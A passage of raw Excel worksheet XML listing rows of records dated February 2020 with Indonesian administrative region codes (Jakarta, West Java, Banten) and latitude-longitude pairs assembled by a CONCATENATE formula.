      <c r="D1595" t="s">
        <v>22</v>
      </c>
      <c r="E1595" t="s">
        <v>23</v>
      </c>
      <c r="F1595" t="s">
        <v>5502</v>
      </c>
      <c r="G1595" t="s">
        <v>5503</v>
      </c>
      <c r="H1595" t="s">
        <v>26</v>
      </c>
      <c r="I1595" t="s">
        <v>1710</v>
      </c>
      <c r="J1595" t="s">
        <v>1745</v>
      </c>
      <c r="L1595" t="s">
        <v>5504</v>
      </c>
      <c r="M1595">
        <v>3175050003</v>
      </c>
      <c r="N1595">
        <v>3175050</v>
      </c>
      <c r="O1595">
        <v>3175</v>
      </c>
      <c r="P1595">
        <v>31</v>
      </c>
      <c r="Q1595" t="s">
        <v>1740</v>
      </c>
      <c r="R1595" t="s">
        <v>1013</v>
      </c>
      <c r="S1595" t="s">
        <v>547</v>
      </c>
      <c r="T1595" t="s">
        <v>33</v>
      </c>
      <c r="U1595" s="5">
        <v>10691239</v>
      </c>
      <c r="V1595" s="5" t="s">
        <v>15621</v>
      </c>
      <c r="W1595" s="5">
        <v>-615813</v>
      </c>
      <c r="X1595" t="s">
        <v>19058</v>
      </c>
      <c r="Y1595" t="str">
        <f t="shared" si="24"/>
        <v>-6.15813,106.91239</v>
      </c>
    </row>
    <row r="1596" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1596">
        <v>109121</v>
      </c>
      <c r="B1596" s="1">
        <v>43886</v>
      </c>
      <c r="C1596">
        <v>0</v>
      </c>
      <c r="D1596" t="s">
        <v>22</v>
      </c>
      <c r="E1596" t="s">
        <v>23</v>
      </c>
      <c r="F1596" t="s">
        <v>5505</v>
      </c>
      <c r="H1596" t="s">
        <v>26</v>
      </c>
      <c r="I1596" t="s">
        <v>1364</v>
      </c>
      <c r="J1596" t="s">
        <v>3135</v>
      </c>
      <c r="L1596" t="s">
        <v>5506</v>
      </c>
      <c r="M1596">
        <v>3603180002</v>
      </c>
      <c r="N1596">
        <v>3603180</v>
      </c>
      <c r="O1596">
        <v>3603</v>
      </c>
      <c r="P1596">
        <v>36</v>
      </c>
      <c r="Q1596" t="s">
        <v>5507</v>
      </c>
      <c r="R1596" t="s">
        <v>5508</v>
      </c>
      <c r="S1596" t="s">
        <v>201</v>
      </c>
      <c r="T1596" t="s">
        <v>171</v>
      </c>
      <c r="U1596" s="5">
        <v>10658720</v>
      </c>
      <c r="V1596" s="5" t="s">
        <v>15894</v>
      </c>
      <c r="W1596" s="5">
        <v>-615650</v>
      </c>
      <c r="X1596" t="s">
        <v>18854</v>
      </c>
      <c r="Y1596" t="str">
        <f t="shared" si="24"/>
        <v>-6.15650,106.58720</v>
      </c>
    </row>
    <row r="1597" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1597">
        <v>109122</v>
      </c>
      <c r="B1597" s="1">
        <v>43886</v>
      </c>
      <c r="C1597">
        <v>0</v>
      </c>
      <c r="D1597" t="s">
        <v>22</v>
      </c>
      <c r="E1597" t="s">
        <v>23</v>
      </c>
      <c r="F1597" t="s">
        <v>5509</v>
      </c>
      <c r="G1597" t="s">
        <v>5510</v>
      </c>
      <c r="H1597" t="s">
        <v>26</v>
      </c>
      <c r="I1597" t="s">
        <v>1971</v>
      </c>
      <c r="J1597" t="s">
        <v>5511</v>
      </c>
      <c r="M1597">
        <v>3171090004</v>
      </c>
      <c r="N1597">
        <v>3171090</v>
      </c>
      <c r="O1597">
        <v>3171</v>
      </c>
      <c r="P1597">
        <v>31</v>
      </c>
      <c r="Q1597" t="s">
        <v>1074</v>
      </c>
      <c r="R1597" t="s">
        <v>347</v>
      </c>
      <c r="S1597" t="s">
        <v>108</v>
      </c>
      <c r="T1597" t="s">
        <v>33</v>
      </c>
      <c r="U1597" s="5">
        <v>10686281</v>
      </c>
      <c r="V1597" s="5" t="s">
        <v>15895</v>
      </c>
      <c r="W1597" s="5">
        <v>-622833</v>
      </c>
      <c r="X1597" t="s">
        <v>19658</v>
      </c>
      <c r="Y1597" t="str">
        <f t="shared" si="24"/>
        <v>-6.22833,106.86281</v>
      </c>
    </row>
    <row r="1598" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1598">
        <v>109123</v>
      </c>
      <c r="B1598" s="1">
        <v>43886</v>
      </c>
      <c r="C1598">
        <v>0</v>
      </c>
      <c r="D1598" t="s">
        <v>22</v>
      </c>
      <c r="E1598" t="s">
        <v>23</v>
      </c>
      <c r="F1598" t="s">
        <v>5512</v>
      </c>
      <c r="G1598" t="s">
        <v>5513</v>
      </c>
      <c r="H1598" t="s">
        <v>26</v>
      </c>
      <c r="I1598" t="s">
        <v>628</v>
      </c>
      <c r="J1598" t="s">
        <v>2627</v>
      </c>
      <c r="L1598" t="s">
        <v>5514</v>
      </c>
      <c r="M1598">
        <v>3275060008</v>
      </c>
      <c r="N1598">
        <v>3275060</v>
      </c>
      <c r="O1598">
        <v>3275</v>
      </c>
      <c r="P1598">
        <v>32</v>
      </c>
      <c r="Q1598" t="s">
        <v>2473</v>
      </c>
      <c r="R1598" t="s">
        <v>114</v>
      </c>
      <c r="S1598" t="s">
        <v>41</v>
      </c>
      <c r="T1598" t="s">
        <v>42</v>
      </c>
      <c r="U1598" s="5">
        <v>10697888</v>
      </c>
      <c r="V1598" s="5" t="s">
        <v>15896</v>
      </c>
      <c r="W1598" s="5">
        <v>-623928</v>
      </c>
      <c r="X1598" t="s">
        <v>19659</v>
      </c>
      <c r="Y1598" t="str">
        <f t="shared" si="24"/>
        <v>-6.23928,106.97888</v>
      </c>
    </row>
    <row r="1599" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1599">
        <v>109124</v>
      </c>
      <c r="B1599" s="1">
        <v>43886</v>
      </c>
      <c r="C1599">
        <v>0</v>
      </c>
      <c r="D1599" t="s">
        <v>22</v>
      </c>
      <c r="E1599" t="s">
        <v>23</v>
      </c>
      <c r="F1599" t="s">
        <v>5515</v>
      </c>
      <c r="H1599" t="s">
        <v>26</v>
      </c>
      <c r="I1599" t="s">
        <v>166</v>
      </c>
      <c r="J1599" t="s">
        <v>3135</v>
      </c>
      <c r="L1599" t="s">
        <v>5516</v>
      </c>
      <c r="M1599">
        <v>3671012005</v>
      </c>
      <c r="N1599">
        <v>3671012</v>
      </c>
      <c r="O1599">
        <v>3671</v>
      </c>
      <c r="P1599">
        <v>36</v>
      </c>
      <c r="Q1599" t="s">
        <v>5517</v>
      </c>
      <c r="R1599" t="s">
        <v>760</v>
      </c>
      <c r="S1599" t="s">
        <v>201</v>
      </c>
      <c r="T1599" t="s">
        <v>171</v>
      </c>
      <c r="U1599" s="5">
        <v>10671809</v>
      </c>
      <c r="V1599" s="5" t="s">
        <v>15897</v>
      </c>
      <c r="W1599" s="5">
        <v>-620379</v>
      </c>
      <c r="X1599" t="s">
        <v>19660</v>
      </c>
      <c r="Y1599" t="str">
        <f t="shared" si="24"/>
        <v>-6.20379,106.71809</v>
      </c>
    </row>
    <row r="1600" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1600">
        <v>109125</v>
      </c>
      <c r="B1600" s="1">
        <v>43886</v>
      </c>
      <c r="C1600">
        <v>0</v>
      </c>
      <c r="D1600" t="s">
        <v>22</v>
      </c>
      <c r="E1600" t="s">
        <v>23</v>
      </c>
      <c r="F1600" t="s">
        <v>5518</v>
      </c>
      <c r="G1600" t="s">
        <v>5519</v>
      </c>
      <c r="H1600" t="s">
        <v>26</v>
      </c>
      <c r="I1600" t="s">
        <v>76</v>
      </c>
      <c r="J1600" t="s">
        <v>5356</v>
      </c>
      <c r="L1600" t="s">
        <v>5520</v>
      </c>
      <c r="M1600">
        <v>3172050005</v>
      </c>
      <c r="N1600">
        <v>3172050</v>
      </c>
      <c r="O1600">
        <v>3172</v>
      </c>
      <c r="P1600">
        <v>31</v>
      </c>
      <c r="Q1600" t="s">
        <v>358</v>
      </c>
      <c r="R1600" t="s">
        <v>358</v>
      </c>
      <c r="S1600" t="s">
        <v>49</v>
      </c>
      <c r="T1600" t="s">
        <v>33</v>
      </c>
      <c r="U1600" s="5">
        <v>10687573</v>
      </c>
      <c r="V1600" s="5" t="s">
        <v>15898</v>
      </c>
      <c r="W1600" s="5">
        <v>-628235</v>
      </c>
      <c r="X1600" t="s">
        <v>19661</v>
      </c>
      <c r="Y1600" t="str">
        <f t="shared" si="24"/>
        <v>-6.28235,106.87573</v>
      </c>
    </row>
    <row r="1601" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1601">
        <v>109126</v>
      </c>
      <c r="B1601" s="1">
        <v>43886</v>
      </c>
      <c r="C1601">
        <v>0</v>
      </c>
      <c r="D1601" t="s">
        <v>22</v>
      </c>
      <c r="E1601" t="s">
        <v>23</v>
      </c>
      <c r="F1601" t="s">
        <v>5521</v>
      </c>
      <c r="G1601" t="s">
        <v>5522</v>
      </c>
      <c r="H1601" t="s">
        <v>26</v>
      </c>
      <c r="I1601" t="s">
        <v>3603</v>
      </c>
      <c r="J1601" t="s">
        <v>3135</v>
      </c>
      <c r="L1601" t="s">
        <v>5093</v>
      </c>
      <c r="M1601">
        <v>3671041005</v>
      </c>
      <c r="N1601">
        <v>3671041</v>
      </c>
      <c r="O1601">
        <v>3671</v>
      </c>
      <c r="P1601">
        <v>36</v>
      </c>
      <c r="Q1601" t="s">
        <v>5523</v>
      </c>
      <c r="R1601" t="s">
        <v>3137</v>
      </c>
      <c r="S1601" t="s">
        <v>201</v>
      </c>
      <c r="T1601" t="s">
        <v>171</v>
      </c>
      <c r="U1601" s="5">
        <v>10660180</v>
      </c>
      <c r="V1601" s="5" t="s">
        <v>15899</v>
      </c>
      <c r="W1601" s="5">
        <v>-618623</v>
      </c>
      <c r="X1601" t="s">
        <v>19662</v>
      </c>
      <c r="Y1601" t="str">
        <f t="shared" si="24"/>
        <v>-6.18623,106.60180</v>
      </c>
    </row>
    <row r="1602" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1602">
        <v>109127</v>
      </c>
      <c r="B1602" s="1">
        <v>43886</v>
      </c>
      <c r="C1602">
        <v>0</v>
      </c>
      <c r="D1602" t="s">
        <v>22</v>
      </c>
      <c r="E1602" t="s">
        <v>23</v>
      </c>
      <c r="F1602" t="s">
        <v>5524</v>
      </c>
      <c r="G1602" t="s">
        <v>5525</v>
      </c>
      <c r="H1602" t="s">
        <v>26</v>
      </c>
      <c r="I1602" t="s">
        <v>3062</v>
      </c>
      <c r="J1602" t="s">
        <v>2627</v>
      </c>
      <c r="L1602" t="s">
        <v>5526</v>
      </c>
      <c r="M1602">
        <v>3216070013</v>
      </c>
      <c r="N1602">
        <v>3216070</v>
      </c>
      <c r="O1602">
        <v>3216</v>
      </c>
      <c r="P1602">
        <v>32</v>
      </c>
      <c r="Q1602" t="s">
        <v>5527</v>
      </c>
      <c r="R1602" t="s">
        <v>5479</v>
      </c>
      <c r="S1602" t="s">
        <v>41</v>
      </c>
      <c r="T1602" t="s">
        <v>42</v>
      </c>
      <c r="U1602" s="5">
        <v>10709433</v>
      </c>
      <c r="V1602" s="5" t="s">
        <v>15900</v>
      </c>
      <c r="W1602" s="5">
        <v>-625251</v>
      </c>
      <c r="X1602" t="s">
        <v>19663</v>
      </c>
      <c r="Y1602" t="str">
        <f t="shared" si="24"/>
        <v>-6.25251,107.09433</v>
      </c>
    </row>
    <row r="1603" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1603">
        <v>109128</v>
      </c>
      <c r="B1603" s="1">
        <v>43886</v>
      </c>
      <c r="C1603">
        <v>0</v>
      </c>
      <c r="D1603" t="s">
        <v>22</v>
      </c>
      <c r="E1603" t="s">
        <v>23</v>
      </c>
      <c r="F1603" t="s">
        <v>5528</v>
      </c>
      <c r="G1603" t="s">
        <v>5529</v>
      </c>
      <c r="H1603" t="s">
        <v>26</v>
      </c>
      <c r="I1603" t="s">
        <v>5530</v>
      </c>
      <c r="J1603" t="s">
        <v>5531</v>
      </c>
      <c r="L1603" t="s">
        <v>5532</v>
      </c>
      <c r="M1603">
        <v>3171060004</v>
      </c>
      <c r="N1603">
        <v>3171060</v>
      </c>
      <c r="O1603">
        <v>3171</v>
      </c>
      <c r="P1603">
        <v>31</v>
      </c>
      <c r="Q1603" t="s">
        <v>5027</v>
      </c>
      <c r="R1603" t="s">
        <v>1236</v>
      </c>
      <c r="S1603" t="s">
        <v>108</v>
      </c>
      <c r="T1603" t="s">
        <v>33</v>
      </c>
      <c r="U1603" s="5">
        <v>10681482</v>
      </c>
      <c r="V1603" s="5" t="s">
        <v>15901</v>
      </c>
      <c r="W1603" s="5">
        <v>-623997</v>
      </c>
      <c r="X1603" t="s">
        <v>19664</v>
      </c>
      <c r="Y1603" t="str">
        <f t="shared" ref="Y1603:Y1666" si="25">CONCATENATE(X1603,",",V1603)</f>
        <v>-6.23997,106.81482</v>
      </c>
    </row>
    <row r="1604" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1604">
        <v>109129</v>
      </c>
      <c r="B1604" s="1">
        <v>43886</v>
      </c>
      <c r="C1604">
        <v>0</v>
      </c>
      <c r="D1604" t="s">
        <v>22</v>
      </c>
      <c r="E1604" t="s">
        <v>23</v>
      </c>
      <c r="F1604" t="s">
        <v>5533</v>
      </c>
      <c r="H1604" t="s">
        <v>26</v>
      </c>
      <c r="I1604" t="s">
        <v>893</v>
      </c>
      <c r="J1604" t="s">
        <v>2627</v>
      </c>
      <c r="L1604" t="s">
        <v>5534</v>
      </c>
      <c r="M1604">
        <v>3275061001</v>
      </c>
      <c r="N1604">
        <v>3275061</v>
      </c>
      <c r="O1604">
        <v>3275</v>
      </c>
      <c r="P1604">
        <v>32</v>
      </c>
      <c r="Q1604" t="s">
        <v>494</v>
      </c>
      <c r="R1604" t="s">
        <v>40</v>
      </c>
      <c r="S1604" t="s">
        <v>41</v>
      </c>
      <c r="T1604" t="s">
        <v>42</v>
      </c>
      <c r="U1604" s="5">
        <v>10699492</v>
      </c>
      <c r="V1604" s="5" t="s">
        <v>15902</v>
      </c>
      <c r="W1604" s="5">
        <v>-623099</v>
      </c>
      <c r="X1604" t="s">
        <v>19665</v>
      </c>
      <c r="Y1604" t="str">
        <f t="shared" si="25"/>
        <v>-6.23099,106.99492</v>
      </c>
    </row>
    <row r="1605" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1605">
        <v>109130</v>
      </c>
      <c r="B1605" s="1">
        <v>43886</v>
      </c>
      <c r="C1605">
        <v>0</v>
      </c>
      <c r="D1605" t="s">
        <v>22</v>
      </c>
      <c r="E1605" t="s">
        <v>23</v>
      </c>
      <c r="F1605" t="s">
        <v>5535</v>
      </c>
      <c r="G1605" t="s">
        <v>5536</v>
      </c>
      <c r="H1605" t="s">
        <v>26</v>
      </c>
      <c r="I1605" t="s">
        <v>1538</v>
      </c>
      <c r="J1605" t="s">
        <v>2627</v>
      </c>
      <c r="M1605">
        <v>3275060008</v>
      </c>
      <c r="N1605">
        <v>3275060</v>
      </c>
      <c r="O1605">
        <v>3275</v>
      </c>
      <c r="P1605">
        <v>32</v>
      </c>
      <c r="Q1605" t="s">
        <v>2473</v>
      </c>
      <c r="R1605" t="s">
        <v>114</v>
      </c>
      <c r="S1605" t="s">
        <v>41</v>
      </c>
      <c r="T1605" t="s">
        <v>42</v>
      </c>
      <c r="U1605" s="5">
        <v>10696630</v>
      </c>
      <c r="V1605" s="5" t="s">
        <v>15903</v>
      </c>
      <c r="W1605" s="5">
        <v>-624325</v>
      </c>
      <c r="X1605" t="s">
        <v>19666</v>
      </c>
      <c r="Y1605" t="str">
        <f t="shared" si="25"/>
        <v>-6.24325,106.96630</v>
      </c>
    </row>
    <row r="1606" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1606">
        <v>109131</v>
      </c>
      <c r="B1606" s="1">
        <v>43886</v>
      </c>
      <c r="C1606">
        <v>0</v>
      </c>
      <c r="D1606" t="s">
        <v>22</v>
      </c>
      <c r="E1606" t="s">
        <v>23</v>
      </c>
      <c r="F1606" t="s">
        <v>5537</v>
      </c>
      <c r="G1606" t="s">
        <v>5538</v>
      </c>
      <c r="H1606" t="s">
        <v>26</v>
      </c>
      <c r="I1606" t="s">
        <v>1559</v>
      </c>
      <c r="J1606" t="s">
        <v>894</v>
      </c>
      <c r="L1606" t="s">
        <v>5539</v>
      </c>
      <c r="M1606">
        <v>3174020005</v>
      </c>
      <c r="N1606">
        <v>3174020</v>
      </c>
      <c r="O1606">
        <v>3174</v>
      </c>
      <c r="P1606">
        <v>31</v>
      </c>
      <c r="Q1606" t="s">
        <v>30</v>
      </c>
      <c r="R1606" t="s">
        <v>31</v>
      </c>
      <c r="S1606" t="s">
        <v>32</v>
      </c>
      <c r="T1606" t="s">
        <v>33</v>
      </c>
      <c r="U1606" s="5">
        <v>10677327</v>
      </c>
      <c r="V1606" s="5" t="s">
        <v>15904</v>
      </c>
      <c r="W1606" s="5">
        <v>-617180</v>
      </c>
      <c r="X1606" t="s">
        <v>19667</v>
      </c>
      <c r="Y1606" t="str">
        <f t="shared" si="25"/>
        <v>-6.17180,106.77327</v>
      </c>
    </row>
    <row r="1607" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1607">
        <v>109132</v>
      </c>
      <c r="B1607" s="1">
        <v>43886</v>
      </c>
      <c r="C1607">
        <v>0</v>
      </c>
      <c r="D1607" t="s">
        <v>22</v>
      </c>
      <c r="E1607" t="s">
        <v>23</v>
      </c>
      <c r="F1607" t="s">
        <v>5540</v>
      </c>
      <c r="G1607" t="s">
        <v>5541</v>
      </c>
      <c r="H1607" t="s">
        <v>26</v>
      </c>
      <c r="I1607" t="s">
        <v>788</v>
      </c>
      <c r="J1607" t="s">
        <v>5542</v>
      </c>
      <c r="L1607" t="s">
        <v>5543</v>
      </c>
      <c r="M1607">
        <v>3173030002</v>
      </c>
      <c r="N1607">
        <v>3173030</v>
      </c>
      <c r="O1607">
        <v>3173</v>
      </c>
      <c r="P1607">
        <v>31</v>
      </c>
      <c r="Q1607" t="s">
        <v>3127</v>
      </c>
      <c r="R1607" t="s">
        <v>3128</v>
      </c>
      <c r="S1607" t="s">
        <v>62</v>
      </c>
      <c r="T1607" t="s">
        <v>33</v>
      </c>
      <c r="U1607" s="5">
        <v>10685137</v>
      </c>
      <c r="V1607" s="5" t="s">
        <v>15905</v>
      </c>
      <c r="W1607" s="5">
        <v>-618814</v>
      </c>
      <c r="X1607" t="s">
        <v>19668</v>
      </c>
      <c r="Y1607" t="str">
        <f t="shared" si="25"/>
        <v>-6.18814,106.85137</v>
      </c>
    </row>
    <row r="1608" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1608">
        <v>109133</v>
      </c>
      <c r="B1608" s="1">
        <v>43886</v>
      </c>
      <c r="C1608">
        <v>0</v>
      </c>
      <c r="D1608" t="s">
        <v>22</v>
      </c>
      <c r="E1608" t="s">
        <v>23</v>
      </c>
      <c r="F1608" t="s">
        <v>5544</v>
      </c>
      <c r="G1608" t="s">
        <v>5545</v>
      </c>
      <c r="H1608" t="s">
        <v>26</v>
      </c>
      <c r="I1608" t="s">
        <v>1364</v>
      </c>
      <c r="J1608" t="s">
        <v>5546</v>
      </c>
      <c r="L1608" t="s">
        <v>5547</v>
      </c>
      <c r="M1608">
        <v>3174070003</v>
      </c>
      <c r="N1608">
        <v>3174070</v>
      </c>
      <c r="O1608">
        <v>3174</v>
      </c>
      <c r="P1608">
        <v>31</v>
      </c>
      <c r="Q1608" t="s">
        <v>1260</v>
      </c>
      <c r="R1608" t="s">
        <v>84</v>
      </c>
      <c r="S1608" t="s">
        <v>32</v>
      </c>
      <c r="T1608" t="s">
        <v>33</v>
      </c>
      <c r="U1608" s="5">
        <v>10676419</v>
      </c>
      <c r="V1608" s="5" t="s">
        <v>15906</v>
      </c>
      <c r="W1608" s="5">
        <v>-615843</v>
      </c>
      <c r="X1608" t="s">
        <v>19669</v>
      </c>
      <c r="Y1608" t="str">
        <f t="shared" si="25"/>
        <v>-6.15843,106.76419</v>
      </c>
    </row>
    <row r="1609" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1609">
        <v>109134</v>
      </c>
      <c r="B1609" s="1">
        <v>43886</v>
      </c>
      <c r="C1609">
        <v>0</v>
      </c>
      <c r="D1609" t="s">
        <v>22</v>
      </c>
      <c r="E1609" t="s">
        <v>23</v>
      </c>
      <c r="F1609" t="s">
        <v>5548</v>
      </c>
      <c r="G1609" t="s">
        <v>5549</v>
      </c>
      <c r="H1609" t="s">
        <v>26</v>
      </c>
      <c r="I1609" t="s">
        <v>555</v>
      </c>
      <c r="J1609" t="s">
        <v>3490</v>
      </c>
      <c r="M1609">
        <v>3171090005</v>
      </c>
      <c r="N1609">
        <v>3171090</v>
      </c>
      <c r="O1609">
        <v>3171</v>
      </c>
      <c r="P1609">
        <v>31</v>
      </c>
      <c r="Q1609" t="s">
        <v>1300</v>
      </c>
      <c r="R1609" t="s">
        <v>347</v>
      </c>
      <c r="S1609" t="s">
        <v>108</v>
      </c>
      <c r="T1609" t="s">
        <v>33</v>
      </c>
      <c r="U1609" s="5">
        <v>10685401</v>
      </c>
      <c r="V1609" s="5" t="s">
        <v>15907</v>
      </c>
      <c r="W1609" s="5">
        <v>-622135</v>
      </c>
      <c r="X1609" t="s">
        <v>19670</v>
      </c>
      <c r="Y1609" t="str">
        <f t="shared" si="25"/>
        <v>-6.22135,106.85401</v>
      </c>
    </row>
    <row r="1610" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1610">
        <v>109135</v>
      </c>
      <c r="B1610" s="1">
        <v>43886</v>
      </c>
      <c r="C1610">
        <v>0</v>
      </c>
      <c r="D1610" t="s">
        <v>22</v>
      </c>
      <c r="E1610" t="s">
        <v>23</v>
      </c>
      <c r="F1610" t="s">
        <v>5550</v>
      </c>
      <c r="H1610" t="s">
        <v>26</v>
      </c>
      <c r="I1610" t="s">
        <v>284</v>
      </c>
      <c r="J1610" t="s">
        <v>2627</v>
      </c>
      <c r="L1610" t="s">
        <v>5551</v>
      </c>
      <c r="M1610">
        <v>3275020005</v>
      </c>
      <c r="N1610">
        <v>3275020</v>
      </c>
      <c r="O1610">
        <v>3275</v>
      </c>
      <c r="P1610">
        <v>32</v>
      </c>
      <c r="Q1610" t="s">
        <v>827</v>
      </c>
      <c r="R1610" t="s">
        <v>828</v>
      </c>
      <c r="S1610" t="s">
        <v>41</v>
      </c>
      <c r="T1610" t="s">
        <v>42</v>
      </c>
      <c r="U1610" s="5">
        <v>10695170</v>
      </c>
      <c r="V1610" s="5" t="s">
        <v>15908</v>
      </c>
      <c r="W1610" s="5">
        <v>-628701</v>
      </c>
      <c r="X1610" t="s">
        <v>19671</v>
      </c>
      <c r="Y1610" t="str">
        <f t="shared" si="25"/>
        <v>-6.28701,106.95170</v>
      </c>
    </row>
    <row r="1611" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1611">
        <v>109136</v>
      </c>
      <c r="B1611" s="1">
        <v>43886</v>
      </c>
      <c r="C1611">
        <v>0</v>
      </c>
      <c r="D1611" t="s">
        <v>22</v>
      </c>
      <c r="E1611" t="s">
        <v>23</v>
      </c>
      <c r="F1611" t="s">
        <v>5552</v>
      </c>
      <c r="G1611" t="s">
        <v>5553</v>
      </c>
      <c r="H1611" t="s">
        <v>26</v>
      </c>
      <c r="I1611" t="s">
        <v>961</v>
      </c>
      <c r="J1611" t="s">
        <v>2627</v>
      </c>
      <c r="M1611">
        <v>3275020006</v>
      </c>
      <c r="N1611">
        <v>3275020</v>
      </c>
      <c r="O1611">
        <v>3275</v>
      </c>
      <c r="P1611">
        <v>32</v>
      </c>
      <c r="Q1611" t="s">
        <v>4024</v>
      </c>
      <c r="R1611" t="s">
        <v>828</v>
      </c>
      <c r="S1611" t="s">
        <v>41</v>
      </c>
      <c r="T1611" t="s">
        <v>42</v>
      </c>
      <c r="U1611" s="5">
        <v>10694941</v>
      </c>
      <c r="V1611" s="5" t="s">
        <v>15909</v>
      </c>
      <c r="W1611" s="5">
        <v>-627185</v>
      </c>
      <c r="X1611" t="s">
        <v>19672</v>
      </c>
      <c r="Y1611" t="str">
        <f t="shared" si="25"/>
        <v>-6.27185,106.94941</v>
      </c>
    </row>
    <row r="1612" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1612">
        <v>109137</v>
      </c>
      <c r="B1612" s="1">
        <v>43886</v>
      </c>
      <c r="C1612">
        <v>0</v>
      </c>
      <c r="D1612" t="s">
        <v>22</v>
      </c>
      <c r="E1612" t="s">
        <v>23</v>
      </c>
      <c r="F1612" t="s">
        <v>5554</v>
      </c>
      <c r="H1612" t="s">
        <v>26</v>
      </c>
      <c r="I1612" t="s">
        <v>1447</v>
      </c>
      <c r="J1612" t="s">
        <v>3135</v>
      </c>
      <c r="L1612" t="s">
        <v>5555</v>
      </c>
      <c r="M1612">
        <v>3671011003</v>
      </c>
      <c r="N1612">
        <v>3671011</v>
      </c>
      <c r="O1612">
        <v>3671</v>
      </c>
      <c r="P1612">
        <v>36</v>
      </c>
      <c r="Q1612" t="s">
        <v>5556</v>
      </c>
      <c r="R1612" t="s">
        <v>701</v>
      </c>
      <c r="S1612" t="s">
        <v>201</v>
      </c>
      <c r="T1612" t="s">
        <v>171</v>
      </c>
      <c r="U1612" s="5">
        <v>10674407</v>
      </c>
      <c r="V1612" s="5" t="s">
        <v>15910</v>
      </c>
      <c r="W1612" s="5">
        <v>-624666</v>
      </c>
      <c r="X1612" t="s">
        <v>19673</v>
      </c>
      <c r="Y1612" t="str">
        <f t="shared" si="25"/>
        <v>-6.24666,106.74407</v>
      </c>
    </row>
    <row r="1613" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1613">
        <v>109138</v>
      </c>
      <c r="B1613" s="1">
        <v>43886</v>
      </c>
      <c r="C1613">
        <v>0</v>
      </c>
      <c r="D1613" t="s">
        <v>22</v>
      </c>
      <c r="E1613" t="s">
        <v>23</v>
      </c>
      <c r="F1613" t="s">
        <v>5557</v>
      </c>
      <c r="G1613" t="s">
        <v>5558</v>
      </c>
      <c r="H1613" t="s">
        <v>26</v>
      </c>
      <c r="I1613" t="s">
        <v>72</v>
      </c>
      <c r="J1613" t="s">
        <v>5559</v>
      </c>
      <c r="L1613" t="s">
        <v>5560</v>
      </c>
      <c r="M1613">
        <v>3172010005</v>
      </c>
      <c r="N1613">
        <v>3172010</v>
      </c>
      <c r="O1613">
        <v>3172</v>
      </c>
      <c r="P1613">
        <v>31</v>
      </c>
      <c r="Q1613" t="s">
        <v>5561</v>
      </c>
      <c r="R1613" t="s">
        <v>5562</v>
      </c>
      <c r="S1613" t="s">
        <v>49</v>
      </c>
      <c r="T1613" t="s">
        <v>33</v>
      </c>
      <c r="U1613" s="5">
        <v>10685894</v>
      </c>
      <c r="V1613" s="5" t="s">
        <v>15911</v>
      </c>
      <c r="W1613" s="5">
        <v>-629587</v>
      </c>
      <c r="X1613" t="s">
        <v>19674</v>
      </c>
      <c r="Y1613" t="str">
        <f t="shared" si="25"/>
        <v>-6.29587,106.85894</v>
      </c>
    </row>
    <row r="1614" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1614">
        <v>109139</v>
      </c>
      <c r="B1614" s="1">
        <v>43886</v>
      </c>
      <c r="C1614">
        <v>0</v>
      </c>
      <c r="D1614" t="s">
        <v>22</v>
      </c>
      <c r="E1614" t="s">
        <v>23</v>
      </c>
      <c r="F1614" t="s">
        <v>5563</v>
      </c>
      <c r="G1614" t="s">
        <v>5564</v>
      </c>
      <c r="H1614" t="s">
        <v>26</v>
      </c>
      <c r="I1614" t="s">
        <v>592</v>
      </c>
      <c r="J1614" t="s">
        <v>5565</v>
      </c>
      <c r="M1614">
        <v>3175030002</v>
      </c>
      <c r="N1614">
        <v>3175030</v>
      </c>
      <c r="O1614">
        <v>3175</v>
      </c>
      <c r="P1614">
        <v>31</v>
      </c>
      <c r="Q1614" t="s">
        <v>1592</v>
      </c>
      <c r="R1614" t="s">
        <v>1563</v>
      </c>
      <c r="S1614" t="s">
        <v>547</v>
      </c>
      <c r="T1614" t="s">
        <v>33</v>
      </c>
      <c r="U1614" s="5">
        <v>10686708</v>
      </c>
      <c r="V1614" s="5" t="s">
        <v>15912</v>
      </c>
      <c r="W1614" s="5">
        <v>-615372</v>
      </c>
      <c r="X1614" t="s">
        <v>19675</v>
      </c>
      <c r="Y1614" t="str">
        <f t="shared" si="25"/>
        <v>-6.15372,106.86708</v>
      </c>
    </row>
    <row r="1615" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1615">
        <v>109140</v>
      </c>
      <c r="B1615" s="1">
        <v>43886</v>
      </c>
      <c r="C1615">
        <v>0</v>
      </c>
      <c r="D1615" t="s">
        <v>22</v>
      </c>
      <c r="E1615" t="s">
        <v>23</v>
      </c>
      <c r="F1615" t="s">
        <v>5566</v>
      </c>
      <c r="G1615" t="s">
        <v>5567</v>
      </c>
      <c r="H1615" t="s">
        <v>26</v>
      </c>
      <c r="I1615" t="s">
        <v>1447</v>
      </c>
      <c r="J1615" t="s">
        <v>2627</v>
      </c>
      <c r="M1615">
        <v>3216082002</v>
      </c>
      <c r="N1615">
        <v>3216082</v>
      </c>
      <c r="O1615">
        <v>3216</v>
      </c>
      <c r="P1615">
        <v>32</v>
      </c>
      <c r="Q1615" t="s">
        <v>1273</v>
      </c>
      <c r="R1615" t="s">
        <v>601</v>
      </c>
      <c r="S1615" t="s">
        <v>41</v>
      </c>
      <c r="T1615" t="s">
        <v>42</v>
      </c>
      <c r="U1615" s="5">
        <v>10705871</v>
      </c>
      <c r="V1615" s="5" t="s">
        <v>15913</v>
      </c>
      <c r="W1615" s="5">
        <v>-621893</v>
      </c>
      <c r="X1615" t="s">
        <v>19676</v>
      </c>
      <c r="Y1615" t="str">
        <f t="shared" si="25"/>
